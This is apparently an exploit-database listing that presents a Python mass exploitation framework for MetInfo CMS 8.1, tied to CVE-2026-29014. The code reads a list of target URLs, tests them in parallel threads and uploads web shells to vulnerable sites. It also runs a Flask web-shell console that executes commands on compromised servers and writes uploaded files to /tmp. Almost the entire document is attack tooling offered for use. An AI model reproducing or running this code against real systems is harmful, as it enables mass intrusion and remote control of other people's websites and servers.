Share
## https://sploitus.com/exploit?id=PACKETSTORM:219759
==================================================================================================================================
    | # Title     : MetInfo CMS 8.1 Mass Exploitation & Web Shell Framework                                                          |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://www.metinfo.cn                                                                                           |
    ==================================================================================================================================
    
    [+] Summary    : This Python module is a mass exploitation framework designed to automate the testing and exploitation of multiple MetInfo CMS targets potentially affected by CVE-2026-29014.
    
    [+] POC        :  
    
    #!/usr/bin/env python3
    
    import threading
    import queue
    import json
    from concurrent.futures import ThreadPoolExecutor, as_completed
    
    
    class MetInfoMassExploit:
        """Mass exploitation for multiple targets"""
    
        def __init__(self, targets_file, threads=10, output_file=None, exploit_class=None):
            self.targets = self.load_targets(targets_file)
            self.threads = threads
            self.output_file = output_file
            self.results = []
            self.lock = threading.Lock()
            self.exploit_class = exploit_class
    
        def load_targets(self, file_path):
            """Load targets from file"""
            targets = []
            with open(file_path, 'r') as f:
                for line in f:
                    line = line.strip()
                    if line and not line.startswith('#'):
                        targets.append(line)
            return targets
    
        def exploit_single(self, target_url):
            """Exploit a single target"""
            try:
                if not self.exploit_class:
                    return None
    
                exploit = self.exploit_class(target_url, verbose=False)
    
                if exploit.check_vulnerability():
                    result = {
                        'url': target_url,
                        'vulnerable': True
                    }
    
                    if hasattr(exploit, "get_system_info"):
                        try:
                            result['info'] = exploit.get_system_info()
                        except:
                            result['info'] = None
    
                    if hasattr(exploit, "upload_webshell"):
                        try:
                            webshell = exploit.upload_webshell()
                            if webshell:
                                result['webshell'] = webshell
                        except:
                            pass
    
                    self.log_result(result)
                    return result
    
                else:
                    self.log_result({'url': target_url, 'vulnerable': False})
                    return None
    
            except Exception as e:
                self.log_result({
                    'url': target_url,
                    'vulnerable': False,
                    'error': str(e)
                })
            return None
    
        def log_result(self, result):
            """Log result with thread safety"""
            with self.lock:
                self.results.append(result)
    
                if result.get('vulnerable'):
                    print(f"[+] VULNERABLE: {result.get('url')}")
                    if result.get('webshell'):
                        print(f"    Webshell: {result.get('webshell')}")
                else:
                    print(f"[-] Not vulnerable: {result.get('url')}")
    
        def run(self):
            """Run mass exploitation"""
            print(f"[*] Loaded {len(self.targets)} targets")
            print(f"[*] Using {self.threads} threads")
    
            with ThreadPoolExecutor(max_workers=self.threads) as executor:
                futures = [
                    executor.submit(self.exploit_single, url)
                    for url in self.targets
                ]
    
                for future in as_completed(futures):
                    try:
                        future.result()
                    except Exception:
                        pass
            if self.output_file:
                with open(self.output_file, 'w') as f:
                    json.dump(self.results, f, indent=2)
    
                print(f"[*] Results saved to {self.output_file}")
    
            vulnerable_count = sum(1 for r in self.results if r.get('vulnerable'))
            print(f"\n[*] Summary: {vulnerable_count}/{len(self.targets)} targets vulnerable")
    class MetInfoWebShell:
        """Web-based shell interface using Flask"""
    
        def __init__(self, exploit_instance):
            self.exploit = exploit_instance
            self.app = None
    
        def start(self, host='0.0.0.0', port=8080):
            """Start web shell server"""
            try:
                from flask import Flask, request, render_template_string
                import base64  # FIX: missing import
    
                app = Flask(__name__)
    
                TEMPLATE = '''
                <html>
                <body>
                <h2>MetInfo Web Shell</h2>
    
                <form method="post">
                    <input type="text" name="cmd">
                    <input type="submit">
                </form>
    
                {% if output %}
                <pre>{{ output }}</pre>
                {% endif %}
                </body>
                </html>
                '''
    
                @app.route('/', methods=['GET', 'POST'])
                def index():
                    output = ""
    
                    if request.method == 'POST':
                        if 'cmd' in request.form:
                            cmd = request.form['cmd']
                            output = self.exploit.execute_command(cmd) or ""
    
                        elif 'file' in request.files:
                            file = request.files['file']
                            if file and file.filename:
                                content = file.read()
                                b64_content = base64.b64encode(content).decode()
    
                                remote_path = f"/tmp/{file.filename}"
                                self.exploit.execute_command(
                                    f"echo '{b64_content}' | base64 -d > {remote_path}"
                                )
                                output = f"Uploaded to {remote_path}"
    
                    return render_template_string(TEMPLATE, output=output)
    
                self.app = app
                print(f"[*] Web shell started at http://{host}:{port}")
                app.run(host=host, port=port)
    
            except ImportError:
                print("[-] Flask not installed")
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================